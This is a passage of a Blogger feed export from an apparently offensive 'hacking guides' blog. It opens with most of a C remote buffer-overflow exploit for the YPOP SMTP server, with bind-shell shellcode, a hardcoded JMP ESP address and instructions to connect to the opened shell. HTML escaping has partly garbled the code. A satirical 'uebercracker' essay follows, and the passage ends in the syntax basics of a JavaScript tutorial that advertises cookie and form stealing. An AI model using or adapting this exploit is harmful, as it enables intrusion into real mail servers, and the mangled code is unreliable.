/&gt;"\xe8\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59"&lt;br /&gt;"\x64\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68"&lt;br /&gt;"\x8e\x4e\x0e\xec\xff\xd6\x89\xc7\x81\xec\x00\x01\x00\x00\x57\x56"&lt;br /&gt;"\x53\x89\xe5\xe8\x27\x00\x00\x00\x90\x01\x00\x00\xb6\x19\x18\xe7"&lt;br /&gt;"\xa4\x19\x70\xe9\xe5\x49\x86\x49\xa4\x1a\x70\xc7\xa4\xad\x2e\xe9"&lt;br /&gt;"\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x57\x53\x32\x5f\x33\x32\x00\x5b"&lt;br /&gt;"\x8d\x4b\x20\x51\xff\xd7\x89\xdf\x89\xc3\x8d\x75\x14\x6a\x07\x59"&lt;br /&gt;"\x51\x53\xff\x34\x8f\xff\x55\x04\x59\x89\x04\x8e\xe2\xf2\x2b\x27"&lt;br /&gt;"\x54\xff\x37\xff\x55\x30\x31\xc0\x50\x50\x50\x50\x40\x50\x40\x50"&lt;br /&gt;"\xff\x55\x2c\x89\xc7\x31\xdb\x53\x53\x68\x02\x00\x11\xd7\x89\xe0"&lt;br /&gt;"\x6a\x10\x50\x57\xff\x55\x24\x53\x57\xff\x55\x28\x53\x54\x57\xff"&lt;br 
/&gt;"\x55\x20\x89\xc7\x81\xec\x00\x10\x00\x00\x89\xe3\x6a\x00\x68\x00"&lt;br /&gt;"\x10\x00\x00\x53\x57\xff\x55\x18\x81\xec\x00\x04\x00\x00\xff\xd3";&lt;br /&gt;&lt;br /&gt;// Tested on Win2k SP4&lt;br /&gt;&lt;br /&gt;char ret_code[]="\x23\x9b\x02\x10"; //JMP ESP - libcurl.dll&lt;br /&gt;char jump_back[]="\x89\xe3\x66\x81\xeb\xfb\x01\xff\xe3";&lt;br /&gt;&lt;br /&gt;int fd,bytes;&lt;br /&gt;&lt;br /&gt;void usage(char *prog)&lt;br /&gt;{&lt;br /&gt;printf("Usage: %s &lt;parm&gt;\n",prog);&lt;br /&gt;printf("------\n");&lt;br /&gt;printf(" -h &lt;hostname&gt;e.g (-h 127.0.0.1)\n");&lt;br /&gt;printf(" -p &lt;port&gt;e.g (-p 25\n");&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;int main(int argc, char *argv[])&lt;br /&gt;{&lt;br /&gt;int arg,port,stack,i;&lt;br /&gt;char evilbuf[1024];&lt;br /&gt;char *hostname;&lt;br /&gt;char buffer[300];&lt;br /&gt;struct hostent *he;&lt;br /&gt;struct sockaddr_in client;&lt;br /&gt;&lt;br /&gt;printf("YPOP SMTP Remote Buffer overflow v0.4-0.6\n");&lt;br /&gt;printf(" BindShell Exploit by cyrex\n");&lt;br /&gt;printf("- - - - - - - - - - - - - - - - - - - - - \n");&lt;br /&gt;&lt;br /&gt;if(argc&lt;4) arg="getopt(argc," hostname="optarg;" port="atoi(optarg);" he="gethostbyname(hostname))="="NULL)" fd="socket(AF_INET,SOCK_STREAM,0))="="-1){" sin_family =" AF_INET;" sin_port =" htons(port);" sin_addr =" *((struct"&gt;h_addr);&lt;br /&gt;&lt;br /&gt;if(connect(fd, (struct sockaddr *)&amp;amp;client,sizeof(struct sockaddr))==-1) {&lt;br /&gt;printf("[-] Can't Connect to %s\n",hostname);&lt;br /&gt;exit(-1);&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;printf("[+] Connected!\n");&lt;br /&gt;&lt;br /&gt;if((bytes=recv(fd,buffer,300,0)) == NULL)&lt;br /&gt;{&lt;br /&gt;printf("[-] Error Receiving Welcome\n");&lt;br /&gt;exit(-1);&lt;br /&gt;}&lt;br /&gt;buffer[bytes]='\0';&lt;br /&gt;if((strstr(buffer,"220")==NULL)  (strstr(buffer,"YahooPOPs")==NULL) {&lt;br /&gt;printf("[-] Hmm.. 
you sure this is a SMTP Server?\n");&lt;br /&gt;exit(-1);&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;stack=504-sizeof(shellcode);&lt;br /&gt;memset(evilbuf,0,sizeof(evilbuf));&lt;br /&gt;for(i=0;i&lt;stack;i++)&gt; nc %s %i or\n",hostname,port);&lt;br /&gt;printf(" -&gt; telnet %s %i\n",hostname,port);&lt;br /&gt;&lt;br /&gt;}</content><link rel='replies' type='application/atom+xml' href='http://hacking-guides.blogspot.com/feeds/3992605583603693354/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2811100680510495731&amp;postID=3992605583603693354' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/3992605583603693354'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/3992605583603693354'/><link rel='alternate' type='text/html' href='http://hacking-guides.blogspot.com/2007/12/ypop-smtp-remote-buffer-overflow.html' title='Ypop Smtp Remote Buffer Overflow Exploit'/><author><name>ekansh</name><uri>http://www.blogger.com/profile/09203979474549210138</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2811100680510495731.post-4186793706590078321</id><published>2007-12-02T01:11:00.000-08:00</published><updated>2007-12-02T01:12:08.887-08:00</updated><title type='text'>How to become a master hacker</title><content type='html'>This paper will be broken into two parts, one showing 15 easy steps to becoming a uebercracker and the 
next part showing how to become a ueberadmin and how to stop a uebercracker. A uebercracker is a term phrased by Dan Farmer to refer to some elite (cr/h)acker that is practically impossible to keep out of the networks.&lt;br /&gt;&lt;br /&gt;Here are the steps to becoming a uebercracker.&lt;br /&gt;&lt;br /&gt;Step 1. Relax and remain calm. Remember YOU are a Uebercracker.&lt;br /&gt;&lt;br /&gt;Step 2. If you know a little Unix, you are way ahead of the crowd and can skip past step 3.&lt;br /&gt;&lt;br /&gt;Step 3. You may want to buy a Unix manual or book to let you know what ls, cd and cat do.&lt;br /&gt;&lt;br /&gt;Step 4. Read Usenet for the following groups: alt.irc, alt.security, comp.security.unix. Subscribe to Phrack@well.sf.ca.us to get a background in uebercracker culture.&lt;br /&gt;&lt;br /&gt;Step 5. Ask on alt.irc how to get and compile the latest IRC client and connect to IRC.&lt;br /&gt;&lt;br /&gt;Step 6. Once on IRC, join the #hack channel. (Whew, you are half-way there!)&lt;br /&gt;&lt;br /&gt;Step 7. Now, sit on #hack and send messages to everyone in the channel saying "Hi, What's up?". Be obnoxious to anyone else that joins and asks questions like "Why can't I join #warez?"&lt;br /&gt;&lt;br /&gt;Step 8. (Important Step) Send private messages to everyone asking for new bugs or holes. Here's a good pointer: look around your system for binary programs suid root (look in the Unix manual from step 3 if confused). After finding a suid root binary (i.e. su, chfn, syslog), tell people you have a new bug in that program and you wrote a script for it. If they ask how it works, tell them they are "layme". Remember, YOU are a UeberCracker. Ask them to trade for their get-root scripts.&lt;br /&gt;&lt;br /&gt;Step 9. Make them send you some scripts before you send some garbage file (i.e. a big core file). Tell them it is encrypted or it was messed up and you need to upload your script again.&lt;br /&gt;&lt;br /&gt;Step 10. Spend a week grabbing all the scripts you can. (Don't forget to be obnoxious on #hack, otherwise people will look down on you and not give you anything.)&lt;br /&gt;&lt;br /&gt;Step 11. Hopefully you will now have at least one or two scripts that get you root on most Unixes. Grab root on your local machines, read your admin's mail, or even other users' mail, even rm log files and whatever tempts you. (Look in the Unix manual from step 3 if confused.)&lt;br /&gt;&lt;br /&gt;Step 12. A good test for true uebercrackerness is to be able to fake mail. Ask other uebercrackers how to fake mail (because they have had to pass the same test). Email your admin how "layme" he is and how you got root and how you erased his files, and have it appear to come from satan@evil.com.&lt;br /&gt;&lt;br /&gt;Step 13. Now, to pass into supreme eliteness of uebercrackerness, you brag about your exploits on #hack to everyone. (Make up stuff. Remember, YOU are a uebercracker.)&lt;br /&gt;&lt;br /&gt;Step 14. Wait a few months and have all your notes, etc. ready in your room for when the FBI, Secret Service, and other law enforcement agencies confiscate your equipment. Call eff.org to complain how you were innocent and how you accidentally got someone else's account and only looked because you were curious. (Whatever else may help, throw at them.)&lt;br /&gt;&lt;br /&gt;Step 15. Now for the true final supreme eliteness of all uebercrackers, you go back to #hack and brag about how you were busted. YOU are finally a true Uebercracker.&lt;br /&gt;&lt;br /&gt;Now the next part of the paper is top secret. Please only pass it to trusted administrators and friends and even some trusted mailing lists, Usenet groups, etc. (Make sure no one who is NOT in the inner circle of security gets this.)&lt;br /&gt;&lt;br /&gt;This is broken down into How to Become an UeberAdmin (otherwise known as a security expert) and How to Stop Uebercrackers.&lt;br /&gt;&lt;br /&gt;Step 1. Read the Unix manual (a good idea for admins).&lt;br /&gt;&lt;br /&gt;Step 2. Very Important. chmod 700 rdist; chmod 644 /etc/utmp. Install sendmail 8.6.4. You have probably stopped 60 percent of all Uebercrackers now. Rdist scripts are among the favorites for getting root by uebercrackers.&lt;br /&gt;&lt;br /&gt;Step 3. Okay, maybe you want to actually secure your machine from the elite Uebercrackers who can break into any site on Internet.&lt;br /&gt;&lt;br /&gt;Step 4. Set up your firewall to block rpc/nfs/ip-forwarding/src routing packets. (This only applies to advanced admins who have control of the router, but this will stop 90% of all uebercrackers from attempting your site.)&lt;br /&gt;&lt;br /&gt;Step 5. Apply all CERT and vendor patches to all of your machines. You have just now killed 95% of all uebercrackers.&lt;br /&gt;&lt;br /&gt;Step 6. Run a good password cracker to find open accounts and close them. Run tripwire after making sure your binaries are untouched. Run tcp_wrapper to find if a uebercracker is knocking on your machines. Run ISS to make sure that all your machines are reasonably secure as far as remote configuration goes (i.e. your NFS exports and anon FTP site).&lt;br /&gt;&lt;br /&gt;Step 7. If you have done all of the above, you will have stopped 99% of all uebercrackers. Congrats! (Remember, You are the admin.)&lt;br /&gt;&lt;br /&gt;Step 8. Now there is one percent of uebercrackers that have gained knowledge from reading some security expert's mail (probably gained access to his mail via NFS exports or the guest account. You know how it is: like the mechanic that always has a broken car, or the plumber that has the broken sink, the security expert usually has an open machine.)&lt;br /&gt;&lt;br /&gt;Step 9. Here is the hard part: trying to convince these security experts that they are not so above the average citizen and that by now giving out their unknown (except for the uebercrackers) security bugs, it would be a service to Internet. They do not have to post it on Usenet, but share among many other trusted people, and hopefully fixes will come about and new pressure will be applied to vendors to come out with patches.&lt;br /&gt;&lt;br /&gt;Step 10. If you have gained the confidence of enough security experts, you will now be looked up to as an elite security administrator that is able to stop most uebercrackers. The final true test for being a ueberadmin is to compile an IRC client, go onto #hack and log all the bragging and help catch the uebercrackers. If a uebercracker does get into your system, and he has used a new method you have never seen, you can probably tell your other security admins and get half of the replies like - "That bug has been known for years, there just aren't any patches for it yet. Here's my fix." and the other half of the replies will be like - "Wow. That is very impressive. You have just moved up a big notch in my security circle." VERY IMPORTANT HERE: If you see anyone in Usenet's security newsgroups mention anything about that security hole, flame him for discussing it since it could bring down Internet and all Uebercrackers will now have it, and the million other reasons to keep everything secret about security.&lt;br /&gt;&lt;br /&gt;Well, this paper has shown the finer details of security on Internet. It has shown both sides of the coin. Three points I would like to make that would probably clean up most of the security problems on Internet are the following:&lt;br /&gt;&lt;br /&gt;1. Vendors need to make security a little higher than zero in priority. If most vendors shipped their Unixes already secure with most known bugs that have been floating around since the Internet Worm (6 years ago) fixed and patched, then most uebercrackers would be stuck as new machines get added to Internet. (I believe Uebercracker is German for "lame copy-cat that can get root with 3 year old bugs.") An interesting note is that if you check the mail alias for "security@vendor.com", you will probably find it points to /dev/null. Maybe with enough mail, it will overfill /dev/null. (Look in the manual if confused.)&lt;br /&gt;&lt;br /&gt;2. Security experts giving up the attitude that they are above the normal Internet user and trying to give out information that could lead to pressure by other admins on vendors to come out with fixes and patches. Most security experts probably don't realize how far their information has already spread.&lt;br /&gt;&lt;br /&gt;3. 
And probably one of the more important points is just following the steps I have outlined for Stopping a Uebercracker.</content><link rel='replies' type='application/atom+xml' href='http://hacking-guides.blogspot.com/feeds/4186793706590078321/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2811100680510495731&amp;postID=4186793706590078321' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/4186793706590078321'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/4186793706590078321'/><link rel='alternate' type='text/html' href='http://hacking-guides.blogspot.com/2007/12/how-to-become-master-hacker.html' title='How to become a master hacker'/><author><name>ekansh</name><uri>http://www.blogger.com/profile/09203979474549210138</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2811100680510495731.post-3913631361316537259</id><published>2007-11-28T07:10:00.000-08:00</published><updated>2007-11-28T07:12:59.210-08:00</updated><title type='text'>Javascript hacking</title><content type='html'>things to come: example of stealing info from users (anti-virus programs and trojans), story of ciru cookie stealing from acanium, ThePull's javascript exploits, and the about:// exploit. Since so many people were asking when this tutorial would come out I decided to finally put it up. I'd appreciate some feedback. 
Flames without a reason are not welcome. This tutorial is not completely finished.. and probably never will be :(&lt;br /&gt;&lt;br /&gt;-idea: cross site scripting by opening a new page in a frame and then writing to form fields or somehow injecting javascript. Or somehow write the html to the top or bottom.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Intro&lt;br /&gt;&lt;br /&gt;Javascript is used as a client side scripting language, meaning that your browser is what interprets it. It is used on webpages and is secure (for the most part) since it cannot touch any files on your hard drive (besides cookies). It also cannot read/write any files on the server. Knowing javascript can help you both in creating dynamic webpages, meaning webpages that change, and in hacking. First I will start with the basic javascript syntax, then I will list a few sites where you can learn more, and then I will list a few ways you can use javascript to hack.&lt;br /&gt;&lt;br /&gt;There are a few benefits of knowing javascript. For starters, it is really the only (fully supported) language that you can use on a website, making it a very popular language on the net. It is very easy to learn and shares common syntax with many other languages. And it is completely open source: if you find something you like done in javascript you can simply view the source of the page and figure out how it's done. The reason I first got into javascript was because back before I got into hacking I wanted to make my own webpage. I learned HTML very quickly and saw Dynamic HTML (DHTML) mentioned in a few tutorials. I then ventured into the land of javascript, making simple scripts and useful features for my site.&lt;br /&gt;&lt;br /&gt;It was only after I was pretty good with javascript and got into hacking that I slowly saw its potential to be used maliciously. Many javascript techniques are pretty simple and involve tricking the user into doing something. 
Almost pure social engineering with a bit of help from javascript. After using simple javascript tricks to fake login pages for web-based email I thought about other ways javascript could be used to aid my hacking, and I studied it on and off for around a year. Some of these techniques are used by millions of people, some I came up with and are purely theoretical. I hope you will realize how much javascript can aid a hacker.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;1. Basic Syntax&lt;br /&gt;2. Places To Learn More Advanced Javascript&lt;br /&gt;3. Banner Busting &amp;amp; Killing Frames&lt;br /&gt;4. Getting Past Scripts That Filter Javascript&lt;br /&gt;5. Stealing Cookies&lt;br /&gt;6. Stealing Forms&lt;br /&gt;7. Gaining Info On Users&lt;br /&gt;8. Stories Of Javascript Hacks&lt;br /&gt;9. Conclusion&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;1. Basic Syntax&lt;br /&gt;&lt;br /&gt;The basics of javascript are fairly easy if you have programmed anything before. Although javascript is not java, if you know java you should have no problems learning it. The same goes for any other programming language, as most share the same basics that javascript uses. This tutorial might not be for the complete newbie. I would like to be able to do a tutorial like that, but I don't have the time or patience to write one. To begin, if you don't know html you must learn it first!&lt;br /&gt;&lt;br /&gt;Javascript starts with the tag &lt;script language="javascript"&gt; and ends with &lt;/script&gt;&lt;br /&gt;Anything between these two tags is interpreted as javascript by the browser. Remember this, because a few hacks use the fact that if you open a &lt;script type="javascript"&gt; tag and don't close it, all the html on the page underneath it is ignored. You can also use &lt;script type="text/javascript"&gt; and &lt;/script&gt;&lt;br /&gt;.. either way is fine. 
I would also like to mention that many scripts have //--&gt; right before the &lt;/script&gt; tag; this is because they would like to make it compatible with other browsers that do not support javascript. Again, either way is fine, but I will be using the &lt;!-- and //--&gt; because that is how I learned to script and I got used to putting it in.&lt;br /&gt;&lt;br /&gt;Javascript uses the same basic elements as other programming languages, such as variables, flow control, and functions. The only difference is that javascript is a lot more simplified, so anyone with some programming experience can learn javascript very quickly. The hardest part of scripting javascript is to get it to work in all browsers. I will now go over the basics of variables:&lt;br /&gt;&lt;br /&gt;to define a variable as a number you do: var name = 1;&lt;br /&gt;to define a variable as a string you do: var name = 'value';&lt;br /&gt;&lt;br /&gt;A variable is basically the same in all programming languages. I might also point out that javascript does not support pointers. No structs to make your own variables either. Variables of every type are simply defined with 'var'. This can be a hard thing to understand at first, but javascript is much like C++ in how it handles variables and strings. A string is a group of characters, like 'word', which is a string. When you see something like document.write(something); it will try to print whatever is in the variable something. If you do document.write('something'); or document.write("something"); it will print the string 'something'. Now that you have got the variables down, let's see how to use arithmetic operators. This will make 2 variables and add them together to make a new word:&lt;br /&gt;&lt;br /&gt;&lt;script type="text/javascript"&gt;&lt;br /&gt;&lt;!--&lt;br /&gt;var name = 'b0iler';&lt;br /&gt;var adjective = 'owns';&lt;br /&gt;document.write(name+adjective);&lt;br /&gt;//--&gt;&lt;br /&gt;&lt;/script&gt;&lt;br /&gt;&lt;br /&gt;First we define the variable 'name' as b0iler, then we define 'adjective' as owns. 
Then the document.write() function writes it to the page as 'name'+'adjective', or b0ilerowns. If we wanted a space we could have done document.write(name+' '+adjective);&lt;br /&gt;&lt;br /&gt;Escaping characters - This is an important concept in programming, and extremely important in secure programming for other languages.. javascript doesn't really need to worry about secure programming practice since there is nothing that can be gained on the server from exploiting javascript. So what is "escaping"? It is putting a \ in front of certain characters, such as ' and ". If we wanted to print out:&lt;br /&gt;&lt;br /&gt;b0iler's website&lt;br /&gt;&lt;br /&gt;We couldn't do:&lt;br /&gt;&lt;br /&gt;document.write('b0iler's website');&lt;br /&gt;&lt;br /&gt;because the browser would read b0iler and see the ' then stop the string. We need to add a \ before the ' so that the browser knows to print ' and not interpret it as the ending ' of the string. So here is how we could print it:&lt;br /&gt;document.write('b0iler\'s website');&lt;br /&gt;&lt;br /&gt;There are two types of comments in javascript: // which only lasts till the end of the line, and /* which continues for as many lines as it takes until it reaches */. I'll demonstrate:&lt;br /&gt;&lt;br /&gt;&lt;script type="text/javascript"&gt;&lt;br /&gt;&lt;!--&lt;br /&gt;document.write('this will show up'); // this will not, even document.write('blah'); won't&lt;br /&gt;/* document.write('this also will not show up');&lt;br /&gt;this won't either. document.write('or this');&lt;br /&gt;it is all in the comments.. which aren't rendered by the browser */&lt;br /&gt;//--&gt;&lt;br /&gt;&lt;/script&gt;&lt;br /&gt;&lt;br /&gt;The only thing that script will do is print "this will show up". Everything else is in comments, which are not interpreted as javascript by the browser.&lt;br /&gt;&lt;br /&gt;Flow Control is basically changing what the program does depending on whether something is true or not. Again, if you have had any previous programming experience this is old stuff. 
You can do this a few different ways. The simplest is the if-then-else statement. Here is an example:&lt;br /&gt;&lt;br /&gt;&lt;script type="text/javascript"&gt;&lt;br /&gt;&lt;!--&lt;br /&gt;var name = 'b0iler';&lt;br /&gt;if (name == 'b0iler'){ document.write('b0iler is a really cool guy!'); }&lt;br /&gt;else { document.write('b0iler can not define variables worth a hoot!'); }&lt;br /&gt;//--&gt;&lt;br /&gt;&lt;/script&gt;&lt;br /&gt;&lt;br /&gt;Let's break this down step by step. First I create the variable 'name' and define it as b0iler. Then I check if 'name' is equal to "b0iler"; if it is then I write 'b0iler is a really cool guy!', else (if name isn't equal to b0iler) it prints 'b0iler can not define variables worth a hoot!'. You will notice that I put { and } around the actions after the if and else statements. You do this so that javascript knows how much to do when it is true. When I say true think of it this way:&lt;br /&gt;&lt;br /&gt;if (name == 'b0iler')&lt;br /&gt;as&lt;br /&gt;if the variable name is equal to 'b0iler'&lt;br /&gt;&lt;br /&gt;if the statement name == 'b0iler' is false (name does not equal 'b0iler') then whatever is in the {} (curly brackets) is skipped.&lt;br /&gt;&lt;br /&gt;We now run into relational and equality operators. The relational operators are as follows:&lt;br /&gt;&lt;br /&gt;&gt; - Greater than, if the left is greater than the right the statement is true.&lt;br /&gt;&lt; - Less than, if the left is less than the right the statement is true.&lt;br /&gt;&gt;= - Greater than or equal to. If the left is greater than or equal to the right it is true.&lt;br /&gt;&lt;= - Less than or equal to. If the left is less than or equal to the right it is true.&lt;br /&gt;&lt;br /&gt;So let's run through a quick example of this. In this example the variable 'lower' is set to 1 and the variable 'higher' is set to 10. 
If lower is less than higher then we add 10 to lower, otherwise we messed up assigning the variables (or with the if statement).&lt;br /&gt;&lt;br /&gt;&lt;script type="text/javascript"&gt;&lt;br /&gt;&lt;!--&lt;br /&gt;var lower = 1;&lt;br /&gt;var higher = 10;&lt;br /&gt;if (lower &lt; higher){ lower = lower + 10; }&lt;br /&gt;else { document.write('we messed up assigning the variables'); }&lt;br /&gt;//--&gt;&lt;br /&gt;&lt;/script&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;And now the equality operators. You have already seen one of them in an example: if (name == 'b0iler'). The equality operators are == for "equal to" and != for "not equal to". Make sure you always put two equal signs (==) because if you put only one (=) then it will not check for equality. This is a common mistake that is often overlooked.&lt;br /&gt;&lt;br /&gt;Now we will get into loops. Loops repeat the statements in between the curly brackets {} until their condition is no longer true. There are 2 main types of loops I will cover: while and for loops. Here is an example of a while loop:&lt;br /&gt;&lt;br /&gt;&lt;script type="text/javascript"&gt;&lt;br /&gt;&lt;!--&lt;br /&gt;var name = 'b0iler';&lt;br /&gt;var namenumber = 1;&lt;br /&gt;while (namenumber &lt; 5){&lt;br /&gt;name = name + name;&lt;br /&gt;document.write(name);&lt;br /&gt;namenumber = namenumber + 1;&lt;br /&gt;}&lt;br /&gt;//--&gt;&lt;br /&gt;&lt;/script&gt;&lt;br /&gt;&lt;br /&gt;First 'name' is set to b0iler, then 'namenumber' is set to 1. Here is where we hit the loop, a while loop. What happens is: while namenumber is less than 5 it does the following 3 commands inside the brackets {}: name = name + name; document.write(name); namenumber = namenumber + 1; The first statement doubles the length of 'name' by adding itself on to itself. The second statement prints 'name'. And the third statement increases 'namenumber' by 1. So since 'namenumber' goes up 1 each time through the loop, the loop will go through 4 times. 
After the 4th time 'namenumber' will be 5, so the statement namenumber &lt; 5 is no longer true.&lt;br /&gt;&lt;br /&gt;&lt;script type="text/javascript"&gt;&lt;br /&gt;&lt;!--&lt;br /&gt;var name = 'b0iler';&lt;br /&gt;for (var namenumber = 1; namenumber &lt; 5; namenumber = namenumber + 1){&lt;br /&gt;name = name + name;&lt;br /&gt;document.write(name);&lt;br /&gt;}&lt;br /&gt;//--&gt;&lt;br /&gt;&lt;/script&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;First the variable name is defined, then it starts the for loop. It assigns 1 to namenumber, then checks if namenumber is less than 5 every time through the loop, and it increases namenumber by 1 every time through the loop (v
